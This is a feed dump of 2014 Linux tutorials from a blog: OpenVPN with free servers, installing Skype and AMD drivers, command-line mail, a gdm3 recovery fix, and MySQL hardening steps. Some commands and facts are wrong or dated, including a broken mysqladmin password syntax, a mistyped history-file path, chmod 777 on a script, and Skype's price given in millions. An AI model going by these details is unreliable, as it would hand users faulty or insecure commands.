23:24:24 -0700 https://blog.0daylabs.com/2014/09/06/javascript-splitting-a-url-into-parts-using-regex/ https://blog.0daylabs.com/2014/09/06/javascript-splitting-a-url-into-parts-using-regex/ javaScript (How to) Configuring OpenVPN in Linux <p><strong>OpenVPN</strong> is a open source application that enables you to configure Virtual Private Network (VPN). For those who doesn’t know about OpenVPN, it is used to create secure P2P connections and remote access facilities. So it ensures that the users are safe from hawks who try to sniff or eavesdrop your network.</p> <p>Using OpenVPN is very simple. In most of the distributions it is installed by default. If it is not, you can download from the repository by doing a simple,</p> <p><code class="language-plaintext highlighter-rouge">sudo apt-get install openvpn</code></p> <p>After you have installed OpenVPN,  you need VPN servers to be configured to use with it. Generally it is not free. But there are some sites which provide it for <strong><em>free</em></strong> (Yeah,very good people :D). There are many sites out there. But I found better than others (the reason being <em>no</em> signing up/registering, comparatively faster than other VPN providers).</p> <p>So just go to download any of the servers available. Next step is to extract the file and save in some location,</p> <p><code class="language-plaintext highlighter-rouge">tar -xvf filename</code></p> <p>Now,open your terminal (<strong>Remember,you need to be a super user to perform this actions. Else you will get errors while starting your connection</strong>) and don’t forget to switch to the folder which has the extracted files. Let’s here take an example of OpenVPN-Euro1 server. Next step will be to, configure it:</p> <p><code class="language-plaintext highlighter-rouge">openvpn --config vpnbook-euro1-tcp443.ovpn</code></p> <p>Use <strong>tcp443</strong> always. In case it doesn’t connect try using the <strong>udp</strong>. After executing the command, you would be prompted for authentication. The username is vpnbook and you can find the password. VPNBook often changes the password to make sure that this is used by people only who are active (The passwords change once in two weeks if I am not wrong). After this you would get a line stating,</p> <p><strong>Sequence Initialized.</strong></p> <p>That’s it you are done. If you face any difficulties while configuring, don’t hesitate to comment down. We are happy to help.. :)</p> Wed, 09 Jul 2014 00:00:00 -0700 https://blog.0daylabs.com/2014/07/09/configuring-openvpn-in-linux/ https://blog.0daylabs.com/2014/07/09/configuring-openvpn-in-linux/ tutorials linux Installing Skype in Ubuntu 14.04 64-bit (Trusty Tahr) <p>Skype is a freemium instant messaging service which is currently developed by the Microsoft team. Microsoft has acquired Skype two years back for a whooping $8.5 Million and ever since its update to Linux has been floppy. Skype is still used by Millions of people around the world and luckily Microsoft didn’t discontinue the support of Skype for Linux.</p> <p>But a major problem is that Skype is released only for a 32-bit architecture and not for a 64 bit. So installing Sype on a 64-bit architecture takes a little more effort than the other. If you use a 32-bit Ubuntu, you can simply issue this command to download it:</p> <p><code class="language-plaintext highlighter-rouge">sudo apt-get install skype</code></p> <p>If you use a 64-bit Ubuntu architecture, you have to add 32-bit architecture support and then update your system to install skype:</p> <p><code class="language-plaintext highlighter-rouge">sudo dpkg --add-architecture i386</code></p> <p><code class="language-plaintext highlighter-rouge">sudo add-apt-repository "deb http://archive.canonical.com/ $(lsb_release -sc) partner"</code></p> <p><code class="language-plaintext highlighter-rouge">sudo apt-get update &amp;&amp; sudo apt-get install skype</code></p> <p>The first command is to enable Multiarch support in Ubuntu for 64-bit users. Multiarch as the name suggest is enabled so that both the architecture will be supported by Ubuntu. Three years back, Skype has been added to canonical repository. So we have to manually add this repo to our repository. Then you can install Skype with the last command.</p> Wed, 30 Apr 2014 22:16:47 -0700 https://blog.0daylabs.com/2014/04/30/installing-skype-ubuntu-14-04-64-bit-trusty-tahr/ https://blog.0daylabs.com/2014/04/30/installing-skype-ubuntu-14-04-64-bit-trusty-tahr/ tutorials linux Installing and Configuring AMD/ATI drivers in Ubuntu 14.04 (Trusty Tahr) <p>Ubuntu fans will be very excited with a more stable release of Ubuntu 14.04 ( trusty Tahr) which is much better and stable than previous Ubuntu releases especially 13.xx series. But as usual, configuring graphics card is always a headache for any people with a dedicated Graphics card other than the normal Intel card. The situation becomes worse for people with AMD Processors and Dual graphics (Hybrid graphics) because overheating will happen as a result of un-configured Graphics cards. Also, configuring isn’t an easy. As always, you will always come up with dependency clashes, driver issues with desktop managers like <strong>gdm</strong>, <strong>lightdm</strong>  etc.. So I will share with you my experience on how I installed and configured graphics drivers successfully on my <strong>AMD Dual graphics</strong> enabled notebook.</p> <p>The recommended method in AMD site won’t work here because installing directly by executing the the catalyst.run file will create dependency clash with the desktop manager  and will result in failing the loading of desktop manager after the reboot.</p> <p><strong>Easy Method: (might not work sometimes)</strong></p> <p>You can take <strong>Additional drivers</strong> option that comes along with <strong>Software &amp; updates</strong> in Ubuntu which will show you the available drivers (both <strong>proprietary</strong> and open source) and you can choose any one of them. If you need to have more control on your graphics card, it is recommended to go for the Proprietary install.</p> <p><strong>Manual Method:</strong></p> <p>Sometimes, installing through additional drivers will fail. If thats the case, we have to do this manually via command line (like I did because for me, Additional driver installation failed):</p> <ul> <li>Remove/purge current <strong>fglrx</strong> and <strong>fglrx-amdcccle</strong>. We have to reconfigure and install this again for things to work. To do that, follow the commands:</li> </ul> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"> <span class="nb">sudo </span>apt-get remove <span class="nt">--purge</span> fglrx fglrx-amdcccle <span class="nb">sudo </span>apt-get remove <span class="nt">--purge</span> fglrx-updates fglrx-amdcccle-updates</code></pre></figure> <ul> <li> <p>Now reboot the system and login back again.</p> </li> <li> <p>Install the Linux generic headers (It comes along with 14.04 but one of my friends had to do this before continuing or else he was getting errors. So its better to try installing this):</p> </li> </ul> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"> <span class="nb">sudo </span>apt-get <span class="nb">install </span>linux-headers-generic</code></pre></figure> <ul> <li>Now lets install back the drivers</li> </ul> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"> <span class="nb">sudo </span>apt-get <span class="nb">install </span>fglrx fglrx-amdcccle</code></pre></figure> <ul> <li>Once the installation is complete, make sure you give this command before rebooting</li> </ul> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"> <span class="nb">sudo </span>aticonfig <span class="nt">--initial</span></code></pre></figure> <ul> <li>If you are using AMD switchable graphics (just like I do) instead of the above command, give this</li> </ul> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"> <span class="nb">sudo </span>aticonfig <span class="nt">--adapter</span><span class="o">=</span>all <span class="nt">--initial</span></code></pre></figure> <ul> <li>Reboot once again and hurrayyyy.. Once you login back, you can configure your graphics card like you want. :D</li> </ul> <p>Hope this method works for you. If you encounter any problems in between, do comment down and we are happy to help you.</p> Sun, 20 Apr 2014 03:08:05 -0700 https://blog.0daylabs.com/2014/04/20/installing-configuring-amdati-drivers-ubuntu-14-04-trusty-tahr/ https://blog.0daylabs.com/2014/04/20/installing-configuring-amdati-drivers-ubuntu-14-04-trusty-tahr/ tutorials linux (How to) Send an Email from Linux command line ? <p>Linux <strong>Command line</strong> is the most powerful tool that you can get in any Linux machine. We can monitor the on going process, delete/copy/make directories/files etc.. and much more. Today, I successfully configured my Linux to send an email to any person from command line ! Yes that’s right. A bit Geekish huh ? Well, after all, it is a feature of Linux Terminal. So Lets see how can we send an Email with Linux terminal :</p> <p>1) First, we have to configure the mail so that we can send a message with a body and subject. For that, give the following command in Linux terminal :</p> <p><code class="language-plaintext highlighter-rouge">sudo dpkg-reconfigure exim4-config</code></p> <p>This will help us in Configuring the mail.</p> <p>2) In the General type mail configuration choose the option as shown in the following screenshot</p> <p><img src="/images/2014/Send-mail-with-Linux-Terminal.png" alt="Send mail with Linux Terminal" /></p> <p>3) For all the other options , just click ok and go forward until you encounter something like this :<strong> Delivery method for local mail. </strong>There, choose the option <code class="language-plaintext highlighter-rouge">**mbox format in /var/mail**</code>.</p> <p>4) The above 2 options are only the basic ones. You can read about rest of the options that is asked so that you can again customize the way you send the particular email.  Now as the mail is configured, lets see how can we send it through the command line.</p> <p>5) To send a mail, the command is just one line like this :</p> <p><code class="language-plaintext highlighter-rouge">echo “ The body of the mail.” | mail -s “Subject of the mail” you@youremailid.com</code></p> <p>Now if your body of the mail is very large, then you can save the body message in to a file and then you can <strong>send the contents of the file</strong> (and not the file itself as an attachment) with the following command :</p> <p><code class="language-plaintext highlighter-rouge">mail -s "Subject goes here” you@youremailid.com &lt; /home/user-name/bodymessege.log</code></p> <p>6) You can also send <strong>BCC</strong> (Blind Carbon copy) of the same message to multiple email address. To do that, you can give the -b parameter :</p> <p><code class="language-plaintext highlighter-rouge">echo “Body message” | mail -s “Subject goes here” you@yourmail.com -b anothermail@yourmail.com</code></p> <p>Hope our readers like this post. If you have any problem in configuring this, do drop down a comment and we are happy to help.</p> Sun, 02 Feb 2014 00:00:00 -0800 https://blog.0daylabs.com/2014/02/02/send-email-linux-command-line/ https://blog.0daylabs.com/2014/02/02/send-email-linux-command-line/ tutorials linux [Fix] gdm3 doesn't start after installing ATI/AMD drivers in Debian ! <p>Recently, I wrote an article on <a href="https://blog.0daylabs.com/2014/01/15/how-to-install-amdati-drivers-in-debian/"><strong>[How to] Install AMD/ATI drivers in Debian</strong></a>. There in the article, I have warned my readers, it better to install the drivers by the way I have explained there and not by downloading corresponding drivers from their site and Installing it. Why I told you because if you install by downloading the driver from their site, there is a good chance that your gdm3 crashes while rebooting your machine. Now what if it is already happened ? Now your gdm3 really crashed , what to do ? Re-installing gdm3 or installing another desktop manager like KDE or lightdm won’t work. Its because they also will have the same compatibility issue as before. So, if your gdm 3 already crashed, we have to Un-install the drivers and then reboot so that gdm3 will load again and then we have to re-install it in such a way thatt it won’t cause a problem with the display manager. Now follow the steps to recover gdm3 :</p> <p>1) Reboot your machine again and from <strong>GRUB,</strong> choose the Debian recovery mode ( usually the 2nd option) and login to the command line as a root.</p> <p>2) Now go to <code class="language-plaintext highlighter-rouge">/usr/share</code> . There you can see several folders. They will be a folder named some what like “<strong>AMD driver</strong>” or “<strong>ATI ….</strong>. “. If you see a folder related to AMD, that will be the one where we have our <em><strong>Uninstall.sh</strong></em> script. Now all we have to do is to run that script and reboot after it.</p> <p>3) Your gdm3 will again start to work properly. To run the “<em><strong>Uninstall.sh</strong></em>”, do the following commands :</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"> <span class="c">#Moving to the directory</span> <span class="nb">cd</span> /usr/share <span class="c">#Giving the Shell the executable permission</span> <span class="nb">sudo chmod </span>777 uninstall.sh <span class="c">#Executing the script</span> <span class="nb">sudo</span> ./uninstall.sh</code></pre></figure> <p>That’s it. Your gdm3 will again start to function properly from now. Now you can Install the Grpahics driver in the safe way so that it won’t be a mess again. You can read my article to learn more about installing drivers the easy way : <strong><a href="https://blog.0daylabs.com/2014/01/15/how-to-install-amdati-drivers-in-debian/">[How to] Install AMD/ATI drivers in Debian ?</a></strong></p> Wed, 15 Jan 2014 10:26:09 -0800 https://blog.0daylabs.com/2014/01/15/fix-gdm3-doesnt-start-installing-atiamd-drivers-debian/ https://blog.0daylabs.com/2014/01/15/fix-gdm3-doesnt-start-installing-atiamd-drivers-debian/ tutorials linux [How to] Install AMD/ATI drivers in Debian ? <p>After having a fresh Install of Linux on a new system, the next hardest thing to do is to configuring Graphics card. Especially if we have a dedicated Graphics card or may be two Graphics card in Cross-firing mode or SLI mode. I still remember the day when I installed Debian on my laptop for the first time, I didn’t knew how to configure the Graphics card. By default, the Graphics card was up and running in high performance mode. I have an HP gaming laptop with Cross-firing Graphics at that time. Soon after the Install. I saw my system heating up like it was put on a gas stove. Soon I saw my system lagging very much and after some time, it automatically shutdown. I was really wondering what could have happened ? When I again turned on the laptop, I saw a message saying “ Your system has been undergone <strong>Thermal Shutdown</strong>.” I was shocked logged back in to my Windows until the lap has been fully recovered. Later only I learned, How to configure Graphics cards, especially <em><strong>AMD/ATI</strong></em>. SO lets us see how to configure the Graphics card :</p> <p>Before starting, I strongly recommend to follow the below method. Downloading and Installing <strong>AMD/ATI</strong> drivers from their site is not recommended but still you can give it a try if you want. Such Installation will most often have a clash with the** gdm3** causing it will refuse to start again after the installation.</p> <p>Immediately after the installation, the first thing you should do is to configure your Graphics card or else you will face similar situation that I faced. If your ATI card is  Radeon HD 7000, Radeon HD 6000 and Radeon HD 5000 series GPU, the follow the below tutorial :</p> <p>1) Open <code class="language-plaintext highlighter-rouge">/etc/apt/sources.list</code> to add the ATI driver source to the source.lists. To do that , give the following command:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"> nano /etc/apt/sources.list <span class="c">#Add the following command to the end of the file</span> <span class="c"># Debian 7 "Wheezy"</span> deb http://http.debian.net/debian/ wheezy main contrib non-free</code></pre></figure> <p>2) After adding the above commands, save the file and exit. Now enter the following commands one by one :</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"> <span class="nb">sudo </span>aptitude update <span class="nb">sudo </span>aptitude <span class="nt">-r</span> <span class="nb">install </span>linux-headers-<span class="si">$(</span><span class="nb">uname</span> <span class="nt">-r</span>|sed <span class="s1">'s,[^-]*-[^-]*-,,'</span><span class="si">)</span> fglrx-driver</code></pre></figure> <p>3) Now restart the system. Your card will be configured automatically for the best results.</p> <p>Now, If you have Radeon HD 4000, Radeon HD 3000 and Radeon HD 2000 series GPUs, do the following :</p> <p>1) Add the following line to the /etc/apt/sources.list , :</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"> nano /etc/apt/sources.list add the following line to it : <span class="c"># Backported packages for Debian 7 "Wheezy"</span> deb http://http.debian.net/debian/ wheezy-backports main contrib non-free</code></pre></figure> <p>2) Now launch a terminal and give the following commands one by one :</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"> <span class="nb">sudo </span>aptitude update <span class="c">#Install the Appropriate Linux headers</span> <span class="nb">sudo </span>aptitude <span class="nb">install </span>linux-headers-<span class="si">$(</span><span class="nb">uname</span> <span class="nt">-r</span>|sed <span class="s1">'s,[^-]*-[^-]*-,,'</span><span class="si">)</span> <span class="nb">sudo </span>aptitude <span class="nt">-r</span> <span class="nt">-t</span> wheezy-backports <span class="nb">install </span>fglrx-legacy-driver</code></pre></figure> <p>3) Restart your system and you will have the driver Installed with optimum conditions Auto configured. Hurrayy ! That’s it. Your AMD/ATI card is configured and is ready to go. :)</p> <p><strong>NOTE:</strong> </p> <p>If your gdm3 is already crashed or not working properly, you follow the article: “<a href="https://blog.0daylabs.com/2014/01/15/fix-gdm3-doesnt-start-installing-atiamd-drivers-debian/">[Fix] gdm3 doesn’t start after installing ATI/AMD drivers in Debian !</a> “ to fix it and then do this Tutorial.</p> Wed, 15 Jan 2014 10:19:03 -0800 https://blog.0daylabs.com/2014/01/15/how-to-install-amdati-drivers-in-debian/ https://blog.0daylabs.com/2014/01/15/how-to-install-amdati-drivers-in-debian/ tutorials linux 12 steps for Hardening MySQL from Attackers !! <p>MySQL is a relational database management system, based on the Structured Query Language (SQL), which is designed to modify information in the database. It is very popular for its fast performance, high reliability, and ease of use. Relational databases are the common way of storing the increasing amount of information. The way of controlling and operating relational databases depends on TCP/IP, with all the advantages and disadvantages given naturally by using them.</p> <p>The database systems are prone to many security risks like unauthorized activity, malware infections, data corruption or data loss, performance constraint etc. so these database systems and the programs and the functions within them should be secured.</p> <p>**Hardening MySQL  **</p> <p>Securing and hardening database systems (primarily on Linux) using MySQL, as this software is widespread and commonly used. **</p> <p><strong>1) Securing the server</strong>:</p> <p>The application server and the database server should be on different systems, as mostly attacks are possible if physical access is obtained. If they are on the same machine, then any service running on the that machine should be given the lowest permission which will still let the service to run.Remember to install Antivirus and Antispam software, configure firewall, harden the production server and services, disable unnecessary services.</p> <p><strong>2) Secure root account with strong password</strong>:</p> <p>When MySQL is initially installed, default root user account is created, hackers often try to gain access of its permission. So change the root username and password,</p> <p>To change the admin’s username, use the rename command in the MySQL console:</p> <p><code class="language-plaintext highlighter-rouge">mysql&gt; RENAME USER root TO new_user;            // default username is root</code></p> <p>To change (or update) a root password:</p> <p><code class="language-plaintext highlighter-rouge">mysqladmin -u root -p oldpassword newpass</code></p> <p><strong>3) Confine or disable remote access</strong>:</p> <p>Through TCP wrappers, iptables, or any other firewall software or hardware, it can be ensure that only defined hosts can access the server. To restrain the MySQL from opening a network socket, add “skip-networking” in the [mysqld] section of <code class="language-plaintext highlighter-rouge">my.cnf</code> or <code class="language-plaintext highlighter-rouge">my.ini</code> ( the file is found in <code class="language-plaintext highlighter-rouge">/etc/mysql/my.cnf</code> ) .</p> <p><strong>4) Disable unauthorized reading from local files</strong>:</p> <p>Disable the <code class="language-plaintext highlighter-rouge">LOAD DATA LOCAL INFILE</code> command as this command can load a file located in the local host or in the server host, in certain cases this command can be used to load the file in which the password is stored. Disabling this will prevent unauthorized reading from local file. In binary distributions, all clients and libraries are compiled with the -enable-local-infile option.</p> <p>To disable it, add the following to the MySQL configuration file:</p> <p><code class="language-plaintext highlighter-rouge">set-variable=local-infile=0</code></p> <p><strong>5) Remove unwanted database user accounts</strong>:</p> <p>When MySQL is installed, default anonymous user accounts are created, which doesn’t have passwords, which makes it easier for an anonymous user to log in to the server.</p> <p>To remove the account, execute the following command:</p> <p><code class="language-plaintext highlighter-rouge">MySQL&gt; DROP USER "";                            // MySQL version 5.0 and above</code></p> <p>For older versions:</p> <p><code class="language-plaintext highlighter-rouge"># MySQL -u root -p</code></p> <p><code class="language-plaintext highlighter-rouge">MySQL&gt; DELETE FROM mysql.user WHERE User = ”;</code></p> <p><code class="language-plaintext highlighter-rouge">MySQL&gt; FLUSH PRIVILEGES;</code></p> <p><strong>6) Remove unused database</strong>:</p> <p>Default databases (test) comes pre-installed with MySQL, they should be removed if not necessary as otherwise unauthorized users can access sensitive information stored in this database. To remove this, use</p> <p><code class="language-plaintext highlighter-rouge">MySQL&gt; drop database test;</code></p> <p><strong>7) Lower system privileges</strong>:</p> <p>To protect the databases, the file directory in which the MySQL directory is stored should be owned by the user “MySQL” and the group “MySQL”. Ensure that only the user “MySQL” and the user “root” have access to the directory var/lib/MySQL. Likewise, the MySQL binaries, which reside under the directory /usr/bin/ , should be owned by “root” or the specific system “MySQL” user. Other users shouldn’t have the access to write to these files.</p> <p><strong>8) Lower database privileges</strong>:</p> <p>Only users who really need root privileges should be granted them, all the other user’s privileges should be reviewed. Anyone having access to the MySQL prompt can use the command “SHOW DATABASES”, can use it to gather data before attacking the database. To disable the usage of this command add the following to /etc/my.cnf</p> <p><code class="language-plaintext highlighter-rouge">skip-show-database</code></p> <p><strong>9) Enable logging in mysql server</strong>:</p> <p>To monitor critical events in a server enable the transaction logging by adding the following lines to the configuration file (<em><strong>/etc/my.cnf</strong></em>):</p> <p><code class="language-plaintext highlighter-rouge">log= /var/log/logfile</code></p> <p>Ensure only <code class="language-plaintext highlighter-rouge">root</code> and <code class="language-plaintext highlighter-rouge">mysql</code> have access to the logfile <code class="language-plaintext highlighter-rouge">hostname.err</code> and <code class="language-plaintext highlighter-rouge">logfileXY</code>. These files are stored in the mysql data directory.</p> <p><strong>10) Change the root directory</strong>:</p> <p><code class="language-plaintext highlighter-rouge">Chroot</code> is the process of changing the apparent disk root directory (and the current running process and its children) to another root directory. The write access of the MySQL processes can be limited by using the chroot environment.To make use of he database administrative tools convenient, add the following to the configuration file:</p> <p><code class="language-plaintext highlighter-rouge">socket = /chroot/mysql/tmp/mysql.sock</code></p> <p><strong>11) Remove History</strong>:</p> <p>During the installation, there is a lot of sensitive information that can assist an intruder to assault a database, this information is stored in the server’s history, they maybe of very good use during installation, but its not needed after the installation. The content of the history file (<code class="language-plaintext highlighter-rouge">~/.mysql_history</code>) should be removed, where all executed commands are stored (including password).</p> <p><code class="language-plaintext highlighter-rouge">cat /dev/null &gt; ~/mysql_history</code></p> <p><strong>12) MySQL should be run on non default port</strong>:</p> <p>MySQL runs on a default port, and the connections should be changed to a different port otherwise, the port will be detected as open by a port scanner and an unauthorized user can get more information about the mysql server. The port can be changed from the configuration file (/etc/mysql), set the port to a different port rather than the default one.</p> <p>By following these steps we can make the database immune to many of the attacks. We can limit the attack possibilities from users who visit our web servers with unfair intentions.</p> Thu, 09 Jan 2014 08:04:33 -0800 https://blog.0daylabs.com/2014/01/09/12-steps-for-hardening-mysql-from-attackers/ https://blog.0daylabs.com/2014/01/09/12-steps-for-hardening-mysql-from-attackers/ hardening linux